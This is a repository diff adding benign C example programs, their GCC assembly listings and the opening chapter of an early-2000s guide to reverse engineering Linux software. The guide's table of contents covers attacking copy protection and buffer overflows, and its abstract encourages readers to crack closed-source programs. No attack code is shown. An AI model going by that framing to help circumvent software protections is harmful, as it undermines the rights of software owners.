pushl $.LC3
call printf
addl $16,%esp
addl $12,%esp
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

22
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/if/ifelseif.c Normal file
View File

@@ -0,0 +1,22 @@
#include <stdio.h>
int main(int argc, char **argv)
{
int a;
if(a < 0)
{
printf("A is less than 0\n");
}
else if(a == 0)
{
printf("A is 0\n");
}
else
{
printf("A > 0\n");
}
printf("Leaving main\n");
}

51
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/dowhile-O0.s Normal file
View File

@@ -0,0 +1,51 @@
.file "dowhile.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d\n"
.text
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp,%ebp
subl $24,%esp
/* Move 0 to var1 */
movl $0,-4(%ebp)
.p2align 4,,7
.L3:
/* call to printf */
addl $-8,%esp
movl -4(%ebp),%eax
pushl %eax
pushl $.LC0
call printf
addl $16,%esp
/* var++ */
incl -4(%ebp)
.L5:
/* Now, here we see the comparason at the bottom, so that the loop
* runs at least once before termination. Turns out the code for the
* comarison is generated the exact same way */
/* jump if var1 <= 9 */
cmpl $9,-4(%ebp)
jle .L6
/* else quit */
jmp .L4
.p2align 4,,7
.L6:
jmp .L3
.p2align 4,,7
.L4:
.L2:
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

40
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/dowhile-O2.s Normal file
View File

@@ -0,0 +1,40 @@
.file "dowhile.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d\n"
.text
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp,%ebp
subl $16,%esp
pushl %esi
pushl %ebx
movl 12(%ebp),%esi
xorl %ebx,%ebx
.p2align 4,,7
.L21:
addl $-8,%esp
pushl %ebx
pushl $.LC0
call printf
incl %ebx
addl $16,%esp
addl $-12,%esp
pushl 4(%esi)
call atoi
addl $16,%esp
cmpl %eax,%ebx
jl .L21
leal -24(%ebp),%esp
popl %ebx
popl %esi
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

30
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/dowhile-full.s Normal file
View File

@@ -0,0 +1,30 @@
.file "dowhile.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d\n"
.text
.align 4
.globl main
.type main,@function
main:
subl $24,%esp
pushl %ebx
xorl %ebx,%ebx
.p2align 4,,7
.L21:
addl $-8,%esp
pushl %ebx
pushl $.LC0
call printf
incl %ebx
addl $16,%esp
cmpl $9,%ebx
jle .L21
popl %ebx
addl $24,%esp
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

13
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/dowhile.c Normal file
View File

@@ -0,0 +1,13 @@
#include <stdio.h>
int main(int argc, char **argv)
{
int i;
i = 0;
do {
printf("%d\n", i);
i++;
} while(i < 10);
}

48
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/for-O0.s Normal file
View File

@@ -0,0 +1,48 @@
.file "for.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d\n"
.text
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp,%ebp
subl $24,%esp
nop
/* move 0 to var1 */
movl $0,-4(%ebp)
.p2align 4,,7
.L3:
/* Jump if var1 le 9, ie if var1 <= 9 */
cmpl $9,-4(%ebp)
jle .L6
/* exit loop */
jmp .L4
.p2align 4,,7
.L6:
/* call to printf */
addl $-8,%esp
movl -4(%ebp),%eax
pushl %eax
pushl $.LC0
call printf
addl $16,%esp
.L5:
/* var++ */
incl -4(%ebp)
jmp .L3
.p2align 4,,7
/* So we see that aside from some extra labels generated for each of
* the sections of the loop, they are the same instructions */
.L4:
.L2:
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

42
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/for-O2.s Normal file
View File

@@ -0,0 +1,42 @@
.file "for.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d\n"
.text
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp,%ebp
subl $16,%esp
pushl %esi
pushl %ebx
movl 12(%ebp),%esi
xorl %ebx,%ebx
jmp .L18
.p2align 4,,7
.L21:
addl $-8,%esp
pushl %ebx
pushl $.LC0
call printf
addl $16,%esp
incl %ebx
.L18:
addl $-12,%esp
pushl 4(%esi)
call atoi
addl $16,%esp
cmpl %eax,%ebx
jl .L21
leal -24(%ebp),%esp
popl %ebx
popl %esi
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

30
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/for-full.s Normal file
View File

@@ -0,0 +1,30 @@
.file "for.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d\n"
.text
.align 4
.globl main
.type main,@function
main:
subl $24,%esp
pushl %ebx
xorl %ebx,%ebx
.p2align 4,,7
.L21:
addl $-8,%esp
pushl %ebx
pushl $.LC0
call printf
addl $16,%esp
incl %ebx
cmpl $9,%ebx
jle .L21
popl %ebx
addl $24,%esp
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

12
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/for.c Normal file
View File

@@ -0,0 +1,12 @@
#include <stdio.h>
int main(int argc, char **argv)
{
int i;
for(i = 0; i < 10; i++)
{
printf("%d\n", i);
}
}

38
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/while-O0.s Normal file
View File

@@ -0,0 +1,38 @@
.file "while.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d\n"
.text
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp,%ebp
subl $24,%esp
movl $0,-4(%ebp)
.p2align 4,,7
.L3:
cmpl $9,-4(%ebp)
jle .L5
jmp .L4
.p2align 4,,7
.L5:
addl $-8,%esp
movl -4(%ebp),%eax
pushl %eax
pushl $.LC0
call printf
addl $16,%esp
incl -4(%ebp)
jmp .L3
.p2align 4,,7
.L4:
.L2:
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

42
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/while-O2.s Normal file
View File

@@ -0,0 +1,42 @@
.file "while.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d\n"
.text
.align 4
.globl main
.type main,@function
main:
pushl %ebp
movl %esp,%ebp
subl $16,%esp
pushl %esi
pushl %ebx
movl 12(%ebp),%esi
xorl %ebx,%ebx
jmp .L18
.p2align 4,,7
.L20:
addl $-8,%esp
pushl %ebx
pushl $.LC0
call printf
incl %ebx
addl $16,%esp
.L18:
addl $-12,%esp
pushl 4(%esi)
call atoi
addl $16,%esp
cmpl %eax,%ebx
jl .L20
leal -24(%ebp),%esp
popl %ebx
popl %esi
leave
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

30
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/while-full.s Normal file
View File

@@ -0,0 +1,30 @@
.file "while.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "%d\n"
.text
.align 4
.globl main
.type main,@function
main:
subl $24,%esp
pushl %ebx
xorl %ebx,%ebx
.p2align 4,,7
.L20:
addl $-8,%esp
pushl %ebx
pushl $.LC0
call printf
incl %ebx
addl $16,%esp
cmpl $9,%ebx
jle .L20
popl %ebx
addl $24,%esp
ret
.Lfe1:
.size main,.Lfe1-main
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

13
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/loops/while.c Normal file
View File

@@ -0,0 +1,13 @@
#include <stdio.h>
int main(int argc, char **argv)
{
int i;
i = 0;
while(i < 10)
{
printf("%d\n", i);
i++;
}
}

38
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/structs/struct.c Normal file
View File

@@ -0,0 +1,38 @@
#include <stdio.h>
struct mystruct
{
int e1;
char e2;
short e3;
};
struct mystruct retstruct()
{
struct mystruct ms;
ms.e1 = 1;
ms.e2 = 2;
ms.e3 = 3;
return ms;
}
void passtruct(struct mystruct ms)
{
ms.e1 = 1;
ms.e2 = 2;
ms.e3 = 3;
printf("%d, %d, %d\n", ms.e1, ms.e2, ms.e3);
}
int main(int argc, char **argv)
{
struct mystruct ms;
ms = retstruct();
passstruct(ms);
printf("%d %d %d\n", ms.e1, ms.e2, ms.e3);
}

603
src/Security/Technical Papers and Notes/Reverse Engineering Guide/index.html Normal file
View File

@@ -0,0 +1,603 @@
<HTML
><HEAD
><TITLE
>Introduction to Reverse Engineering Software in Linux</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="NEXT"
TITLE="The Linux Compilation Process"
HREF="x24.htm"/></HEAD
><BODY
CLASS="article"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="ARTICLE"
><DIV
CLASS="TITLEPAGE"
><H1
CLASS="title"
><A
NAME="AEN2"/>Introduction to Reverse Engineering Software in Linux</H1
><DIV
CLASS="revhistory"
><TABLE
WIDTH="100%"
BORDER="0"
><TR
><TH
ALIGN="LEFT"
VALIGN="TOP"
COLSPAN="3"
><B
>Revision History</B
></TH
></TR
><TR
><TD
ALIGN="LEFT"
>Revision $Revision: 1.26 $</TD
><TD
ALIGN="LEFT"
>$Date: 2002/09/18 06:54:57 $</TD
><TD
ALIGN="LEFT"
></TD
></TR
><TR
><TD
ALIGN="LEFT"
COLSPAN="3"
></TD
></TR
></TABLE
></DIV
><DIV
><DIV
CLASS="abstract"
><A
NAME="AEN8"/><P
><B
>Abstract</B
></P
><P
>&#13; This document is an attempt to provide an introduction to reverse
engineering software in Linux. Since reverse engineering is rapidly coming
under legal fire, this author figures the best response is to make the
knowledge widespread. The idea is that since discussing specific
reverse engineering feats is illegal, we should then discuss general
approaches, so that rather than downloading cracks or
describing weaknesses for programs (yes, BOTH are now illegal),
it is within every Linux user's ability to make them.
Also, closed source programs piss me off. Resistance
is futile. You will be Open Sourced.
</P
></DIV
></DIV
><HR/></DIV
><DIV
CLASS="TOC"
><DL
><DT
><B
>Table of Contents</B
></DT
><DT
>1. <A
HREF="t1.htm#AEN11"
>Introdution</A
></DT
><DD
><DL
><DT
>1.1. <A
HREF="t1.htm#AEN13"
>What is reverse engineering?</A
></DT
><DT
>1.2. <A
HREF="t1.htm#AEN16"
>Why reverse engineer?</A
></DT
><DT
>1.3. <A
HREF="t1.htm#AEN21"
>Legal issues</A
></DT
></DL
></DD
><DT
>2. <A
HREF="x24.htm"
>The Linux Compilation Process</A
></DT
><DD
><DL
><DT
>2.1. <A
HREF="x24.htm#AEN26"
>Intro</A
></DT
><DT
>2.2. <A
HREF="x24.htm#AEN29"
>gcc</A
></DT
><DT
>2.3. <A
HREF="x24.htm#AEN32"
>gcc -E (Preprocessor Stage)</A
></DT
><DT
>2.4. <A
HREF="x24.htm#AEN35"
>gcc -S (Parsing+Translation Stages)</A
></DT
><DT
>2.5. <A
HREF="x24.htm#AEN41"
>as (Assembly Stage)</A
></DT
><DT
>2.6. <A
HREF="x24.htm#AEN44"
>ld/collect2 (Linking Stage)</A
></DT
></DL
></DD
><DT
>3. <A
HREF="x47.htm"
>Gathering Info</A
></DT
><DD
><DL
><DT
>3.1. <A
HREF="x47.htm#AEN50"
>ldd</A
></DT
><DT
>3.2. <A
HREF="x47.htm#AEN53"
>nm</A
></DT
><DT
>3.3. <A
HREF="x47.htm#AEN56"
>/proc</A
></DT
><DT
>3.4. <A
HREF="x47.htm#AEN60"
>netstat</A
></DT
><DT
>3.5. <A
HREF="x47.htm#AEN70"
>lsof</A
></DT
><DT
>3.6. <A
HREF="x47.htm#AEN76"
>fuser</A
></DT
></DL
></DD
><DT
>4. <A
HREF="x79.htm"
>Determining Program Behavior</A
></DT
><DD
><DL
><DT
>4.1. <A
HREF="x79.htm#AEN82"
>strace/truss(Solaris)</A
></DT
><DT
>4.2. <A
HREF="x79.htm#AEN93"
>ltrace</A
></DT
><DT
>4.3. <A
HREF="x79.htm#AEN112"
>LD_PRELOAD</A
></DT
><DT
>4.4. <A
HREF="x79.htm#AEN119"
>gdb</A
></DT
></DL
></DD
><DT
>5. <A
HREF="x125.htm"
>Determining Interesting Functions</A
></DT
><DD
><DL
><DT
>5.1. <A
HREF="x125.htm#AEN128"
>Reconstructing function &amp; control information</A
></DT
><DT
>5.2. <A
HREF="x125.htm#AEN144"
>Consider the objective</A
></DT
><DT
>5.3. <A
HREF="x125.htm#AEN147"
>Finding key functions</A
></DT
><DT
>5.4. <A
HREF="x125.htm#AEN173"
>Plotting out program flow</A
></DT
></DL
></DD
><DT
>6. <A
HREF="x177.htm"
>Understanding Assembly</A
></DT
><DD
><DL
><DT
>6.1. <A
HREF="x177.htm#AEN182"
>Registers</A
></DT
><DT
>6.2. <A
HREF="x177.htm#AEN186"
>The stack</A
></DT
><DT
>6.3. <A
HREF="x177.htm#AEN207"
>Two's complement</A
></DT
><DT
>6.4. <A
HREF="x177.htm#AEN242"
>Reading Assembly</A
></DT
><DT
>6.5. <A
HREF="x177.htm#AEN258"
>Know Your Compiler</A
></DT
></DL
></DD
><DT
>7. <A
HREF="x407.htm"
>Writing Standalone Assembly</A
></DT
><DD
><DL
><DT
>7.1. <A
HREF="x407.htm#AEN410"
>Instructions with side-effects</A
></DT
><DT
>7.2. <A
HREF="x407.htm#AEN413"
>Opcode Tables</A
></DT
><DT
>7.3. <A
HREF="x407.htm#AEN418"
>Using GNU as</A
></DT
><DT
>7.4. <A
HREF="x407.htm#AEN424"
>Conventions on saving registers</A
></DT
><DT
>7.5. <A
HREF="x407.htm#AEN427"
>Using Library Functions</A
></DT
></DL
></DD
><DT
>8. <A
HREF="x430.htm"
>Working with the ELF Program Format</A
></DT
><DD
><DL
><DT
>8.1. <A
HREF="x430.htm#AEN437"
>ELF Layout</A
></DT
><DT
>8.2. <A
HREF="x430.htm#AEN461"
>Editing ELF</A
></DT
></DL
></DD
><DT
>9. <A
HREF="x467.htm"
>Understanding Copy Protection</A
></DT
><DT
>10. <A
HREF="x470.htm"
>Code Modification</A
></DT
><DD
><DL
><DT
>10.1. <A
HREF="x470.htm#AEN473"
>Reasons for Code Modification</A
></DT
><DT
>10.2. <A
HREF="x470.htm#AEN476"
>Instruction Modification</A
></DT
><DT
>10.3. <A
HREF="x470.htm#AEN487"
>Single Instruction Insertion</A
></DT
><DT
>10.4. <A
HREF="x470.htm#AEN490"
>Single Function Insertion</A
></DT
><DT
>10.5. <A
HREF="x470.htm#AEN493"
>Multiple Function Insertion</A
></DT
><DT
>10.6. <A
HREF="x470.htm#AEN496"
>Attacking copy protection</A
></DT
></DL
></DD
><DT
>11. <A
HREF="x499.htm"
>Buffer Overflows</A
></DT
><DD
><DL
><DT
>11.1. <A
HREF="x499.htm#AEN502"
>Stack Overflows</A
></DT
><DT
>11.2. <A
HREF="x499.htm#AEN505"
>1-Byte Overflows</A
></DT
><DT
>11.3. <A
HREF="x499.htm#AEN508"
>Returning to Libc</A
></DT
><DT
>11.4. <A
HREF="x499.htm#AEN511"
>Attacking Countermeasures</A
></DT
><DT
>11.5. <A
HREF="x499.htm#AEN514"
>Heap Overflows</A
></DT
><DT
>11.6. <A
HREF="x499.htm#AEN517"
>Attacking hard copy protection</A
></DT
></DL
></DD
><DT
>12. <A
HREF="x520.htm"
>TODO (Contribute!)</A
></DT
><DD
><DL
><DT
>12.1. <A
HREF="x520.htm#AEN523"
>Write assembly tutorial section</A
></DT
><DT
>12.2. <A
HREF="x520.htm#AEN547"
>Create Diagrams &amp; example outputs</A
></DT
><DT
>12.3. <A
HREF="x520.htm#AEN560"
>More detail</A
></DT
><DT
>12.4. <A
HREF="x520.htm#AEN564"
>Update disasm.pl</A
></DT
><DT
>12.5. <A
HREF="x520.htm#AEN569"
>Do this for windows</A
></DT
><DT
>12.6. <A
HREF="x520.htm#AEN572"
>Do this for protocols</A
></DT
><DT
>12.7. <A
HREF="x520.htm#AEN575"
>Do this for hardware</A
></DT
></DL
></DD
><DT
>13. <A
HREF="x578.htm"
>Extra Resources</A
></DT
><DD
><DL
><DT
>13.1. <A
HREF="x578.htm#AEN580"
>ELF Binary Specification</A
></DT
><DT
>13.2. <A
HREF="x578.htm#AEN596"
>Other Resources and amusements</A
></DT
></DL
></DD
></DL
></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN11"/>1. Introdution</H1
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN13"/>1.1. What is reverse engineering?</H2
><P
>&#13; Reverse engineering as this document will discuss it is simply the
act of figuring out what software that you have no source code
for does.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN16"/>1.2. Why reverse engineer?</H2
><P
>&#13; Answer: Because you can. Software that exists on your system that you
do not have source code to is usually the most interesting kind of
software. Sometimes you may be looking for security holes, sometimes
you are curious how copy protection works, etc. I don't know about
you, but to me, software that I don't have sourcecode to just pisses me
off. So I figure: screw it, lets do some damage.
</P
><P
>&#13; Also, it makes you a better programmer. This book will teach you a
large amount about how your computer works on a low level, and the
better an understanding you have of that, the more efficient programs
you can write in general.
</P
><P
>&#13; If you don't know assembly language,
at the end of this book you will literally know it inside-out. While
most first courses and books on assembly language teach you how to use
it as a programming language, you will get to see how to use C as an
assembly language generation tool, and how to look at and think about
assembly as a C program. This puts you at a tremendous advantage over
your peers not only in terms of programming ability, but also in terms
of your ability to figure out how the black box works. In short,
learning this way will naturually make you a better reverse engineer.
Plus, you will have the fine distinction of being able to answer the question
"Who taught you assembly language?" with "Why, my C compiler, of course!"
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN21"/>1.3. Legal issues</H2
><P
>&#13; Pending...
</P
></DIV
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x24.htm"
ACCESSKEY="N"
>Next</A
></TD
></TR
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
>The Linux Compilation Process</TD
></TR
></TABLE
></DIV
></BODY
></HTML
>

603
src/Security/Technical Papers and Notes/Reverse Engineering Guide/t1.htm Normal file
View File

@@ -0,0 +1,603 @@
<HTML
><HEAD
><TITLE
>Introduction to Reverse Engineering Software in Linux</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"/><LINK
REL="NEXT"
TITLE="The Linux Compilation Process"
HREF="x24.htm"/></HEAD
><BODY
CLASS="article"
BGCOLOR="#FFFFFF"
TEXT="#000000"
LINK="#0000FF"
VLINK="#840084"
ALINK="#0000FF"
><DIV
CLASS="ARTICLE"
><DIV
CLASS="TITLEPAGE"
><H1
CLASS="title"
><A
NAME="AEN2"/>Introduction to Reverse Engineering Software in Linux</H1
><DIV
CLASS="revhistory"
><TABLE
WIDTH="100%"
BORDER="0"
><TR
><TH
ALIGN="LEFT"
VALIGN="TOP"
COLSPAN="3"
><B
>Revision History</B
></TH
></TR
><TR
><TD
ALIGN="LEFT"
>Revision $Revision: 1.26 $</TD
><TD
ALIGN="LEFT"
>$Date: 2002/09/18 06:54:57 $</TD
><TD
ALIGN="LEFT"
></TD
></TR
><TR
><TD
ALIGN="LEFT"
COLSPAN="3"
></TD
></TR
></TABLE
></DIV
><DIV
><DIV
CLASS="abstract"
><A
NAME="AEN8"/><P
><B
>Abstract</B
></P
><P
>&#13; This document is an attempt to provide an introduction to reverse
engineering software in Linux. Since reverse engineering is rapidly coming
under legal fire, this author figures the best response is to make the
knowledge widespread. The idea is that since discussing specific
reverse engineering feats is illegal, we should then discuss general
approaches, so that rather than downloading cracks or
describing weaknesses for programs (yes, BOTH are now illegal),
it is within every Linux user's ability to make them.
Also, closed source programs piss me off. Resistance
is futile. You will be Open Sourced.
</P
></DIV
></DIV
><HR/></DIV
><DIV
CLASS="TOC"
><DL
><DT
><B
>Table of Contents</B
></DT
><DT
>1. <A
HREF="t1.htm#AEN11"
>Introdution</A
></DT
><DD
><DL
><DT
>1.1. <A
HREF="t1.htm#AEN13"
>What is reverse engineering?</A
></DT
><DT
>1.2. <A
HREF="t1.htm#AEN16"
>Why reverse engineer?</A
></DT
><DT
>1.3. <A
HREF="t1.htm#AEN21"
>Legal issues</A
></DT
></DL
></DD
><DT
>2. <A
HREF="x24.htm"
>The Linux Compilation Process</A
></DT
><DD
><DL
><DT
>2.1. <A
HREF="x24.htm#AEN26"
>Intro</A
></DT
><DT
>2.2. <A
HREF="x24.htm#AEN29"
>gcc</A
></DT
><DT
>2.3. <A
HREF="x24.htm#AEN32"
>gcc -E (Preprocessor Stage)</A
></DT
><DT
>2.4. <A
HREF="x24.htm#AEN35"
>gcc -S (Parsing+Translation Stages)</A
></DT
><DT
>2.5. <A
HREF="x24.htm#AEN41"
>as (Assembly Stage)</A
></DT
><DT
>2.6. <A
HREF="x24.htm#AEN44"
>ld/collect2 (Linking Stage)</A
></DT
></DL
></DD
><DT
>3. <A
HREF="x47.htm"
>Gathering Info</A
></DT
><DD
><DL
><DT
>3.1. <A
HREF="x47.htm#AEN50"
>ldd</A
></DT
><DT
>3.2. <A
HREF="x47.htm#AEN53"
>nm</A
></DT
><DT
>3.3. <A
HREF="x47.htm#AEN56"
>/proc</A
></DT
><DT
>3.4. <A
HREF="x47.htm#AEN60"
>netstat</A
></DT
><DT
>3.5. <A
HREF="x47.htm#AEN70"
>lsof</A
></DT
><DT
>3.6. <A
HREF="x47.htm#AEN76"
>fuser</A
></DT
></DL
></DD
><DT
>4. <A
HREF="x79.htm"
>Determining Program Behavior</A
></DT
><DD
><DL
><DT
>4.1. <A
HREF="x79.htm#AEN82"
>strace/truss(Solaris)</A
></DT
><DT
>4.2. <A
HREF="x79.htm#AEN93"
>ltrace</A
></DT
><DT
>4.3. <A
HREF="x79.htm#AEN112"
>LD_PRELOAD</A
></DT
><DT
>4.4. <A
HREF="x79.htm#AEN119"
>gdb</A
></DT
></DL
></DD
><DT
>5. <A
HREF="x125.htm"
>Determining Interesting Functions</A
></DT
><DD
><DL
><DT
>5.1. <A
HREF="x125.htm#AEN128"
>Reconstructing function &amp; control information</A
></DT
><DT
>5.2. <A
HREF="x125.htm#AEN144"
>Consider the objective</A
></DT
><DT
>5.3. <A
HREF="x125.htm#AEN147"
>Finding key functions</A
></DT
><DT
>5.4. <A
HREF="x125.htm#AEN173"
>Plotting out program flow</A
></DT
></DL
></DD
><DT
>6. <A
HREF="x177.htm"
>Understanding Assembly</A
></DT
><DD
><DL
><DT
>6.1. <A
HREF="x177.htm#AEN182"
>Registers</A
></DT
><DT
>6.2. <A
HREF="x177.htm#AEN186"
>The stack</A
></DT
><DT
>6.3. <A
HREF="x177.htm#AEN207"
>Two's complement</A
></DT
><DT
>6.4. <A
HREF="x177.htm#AEN242"
>Reading Assembly</A
></DT
><DT
>6.5. <A
HREF="x177.htm#AEN258"
>Know Your Compiler</A
></DT
></DL
></DD
><DT
>7. <A
HREF="x407.htm"
>Writing Standalone Assembly</A
></DT
><DD
><DL
><DT
>7.1. <A
HREF="x407.htm#AEN410"
>Instructions with side-effects</A
></DT
><DT
>7.2. <A
HREF="x407.htm#AEN413"
>Opcode Tables</A
></DT
><DT
>7.3. <A
HREF="x407.htm#AEN418"
>Using GNU as</A
></DT
><DT
>7.4. <A
HREF="x407.htm#AEN424"
>Conventions on saving registers</A
></DT
><DT
>7.5. <A
HREF="x407.htm#AEN427"
>Using Library Functions</A
></DT
></DL
></DD
><DT
>8. <A
HREF="x430.htm"
>Working with the ELF Program Format</A
></DT
><DD
><DL
><DT
>8.1. <A
HREF="x430.htm#AEN437"
>ELF Layout</A
></DT
><DT
>8.2. <A
HREF="x430.htm#AEN461"
>Editing ELF</A
></DT
></DL
></DD
><DT
>9. <A
HREF="x467.htm"
>Understanding Copy Protection</A
></DT
><DT
>10. <A
HREF="x470.htm"
>Code Modification</A
></DT
><DD
><DL
><DT
>10.1. <A
HREF="x470.htm#AEN473"
>Reasons for Code Modification</A
></DT
><DT
>10.2. <A
HREF="x470.htm#AEN476"
>Instruction Modification</A
></DT
><DT
>10.3. <A
HREF="x470.htm#AEN487"
>Single Instruction Insertion</A
></DT
><DT
>10.4. <A
HREF="x470.htm#AEN490"
>Single Function Insertion</A
></DT
><DT
>10.5. <A
HREF="x470.htm#AEN493"
>Multiple Function Insertion</A
></DT
><DT
>10.6. <A
HREF="x470.htm#AEN496"
>Attacking copy protection</A
></DT
></DL
></DD
><DT
>11. <A
HREF="x499.htm"
>Buffer Overflows</A
></DT
><DD
><DL
><DT
>11.1. <A
HREF="x499.htm#AEN502"
>Stack Overflows</A
></DT
><DT
>11.2. <A
HREF="x499.htm#AEN505"
>1-Byte Overflows</A
></DT
><DT
>11.3. <A
HREF="x499.htm#AEN508"
>Returning to Libc</A
></DT
><DT
>11.4. <A
HREF="x499.htm#AEN511"
>Attacking Countermeasures</A
></DT
><DT
>11.5. <A
HREF="x499.htm#AEN514"
>Heap Overflows</A
></DT
><DT
>11.6. <A
HREF="x499.htm#AEN517"
>Attacking hard copy protection</A
></DT
></DL
></DD
><DT
>12. <A
HREF="x520.htm"
>TODO (Contribute!)</A
></DT
><DD
><DL
><DT
>12.1. <A
HREF="x520.htm#AEN523"
>Write assembly tutorial section</A
></DT
><DT
>12.2. <A
HREF="x520.htm#AEN547"
>Create Diagrams &amp; example outputs</A
></DT
><DT
>12.3. <A
HREF="x520.htm#AEN560"
>More detail</A
></DT
><DT
>12.4. <A
HREF="x520.htm#AEN564"
>Update disasm.pl</A
></DT
><DT
>12.5. <A
HREF="x520.htm#AEN569"
>Do this for windows</A
></DT
><DT
>12.6. <A
HREF="x520.htm#AEN572"
>Do this for protocols</A
></DT
><DT
>12.7. <A
HREF="x520.htm#AEN575"
>Do this for hardware</A
></DT
></DL
></DD
><DT
>13. <A
HREF="x578.htm"
>Extra Resources</A
></DT
><DD
><DL
><DT
>13.1. <A
HREF="x578.htm#AEN580"
>ELF Binary Specification</A
></DT
><DT
>13.2. <A
HREF="x578.htm#AEN596"
>Other Resources and amusements</A
></DT
></DL
></DD
></DL
></DIV
><DIV
CLASS="sect1"
><H1
CLASS="sect1"
><A
NAME="AEN11"/>1. Introdution</H1
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN13"/>1.1. What is reverse engineering?</H2
><P
>&#13; Reverse engineering as this document will discuss it is simply the
act of figuring out what software that you have no source code
for does.
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN16"/>1.2. Why reverse engineer?</H2
><P
>&#13; Answer: Because you can. Software that exists on your system that you
do not have source code to is usually the most interesting kind of
software. Sometimes you may be looking for security holes, sometimes
you are curious how copy protection works, etc. I don't know about
you, but to me, software that I don't have sourcecode to just pisses me
off. So I figure: screw it, lets do some damage.
</P
><P
>&#13; Also, it makes you a better programmer. This book will teach you a
large amount about how your computer works on a low level, and the
better an understanding you have of that, the more efficient programs
you can write in general.
</P
><P
>&#13; If you don't know assembly language,
at the end of this book you will literally know it inside-out. While
most first courses and books on assembly language teach you how to use
it as a programming language, you will get to see how to use C as an
assembly language generation tool, and how to look at and think about
assembly as a C program. This puts you at a tremendous advantage over
your peers not only in terms of programming ability, but also in terms
of your ability to figure out how the black box works. In short,
learning this way will naturually make you a better reverse engineer.
Plus, you will have the fine distinction of being able to answer the question
"Who taught you assembly language?" with "Why, my C compiler, of course!"
</P
></DIV
><DIV
CLASS="sect2"
><H2
CLASS="sect2"
><A
NAME="AEN21"/>1.3. Legal issues</H2
><P
>&#13; Pending...
</P
></DIV
></DIV
></DIV
><DIV
CLASS="NAVFOOTER"
><HR
ALIGN="LEFT"
WIDTH="100%"/><TABLE
SUMMARY="Footer navigation table"
WIDTH="100%"
BORDER="0"
CELLPADDING="0"
CELLSPACING="0"
><TR
><TD
WIDTH="33%"
ALIGN="left"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="34%"
ALIGN="center"
VALIGN="top"
>&nbsp;</TD
><TD
WIDTH="33%"
ALIGN="right"
VALIGN="top"
><A
HREF="x24.htm"
